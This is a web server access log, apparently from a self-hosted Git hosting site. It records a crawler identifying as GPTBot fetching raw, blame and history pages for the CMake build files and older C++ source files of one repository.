"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10808] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10785] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10807] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13524] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13524] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11207] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15357] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12792] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10943] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:16:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:16:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15357] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot" [Client 74.7.227.38] [Length 9762] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:16:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16098] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16096] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10181] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10478] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10181] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20005] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 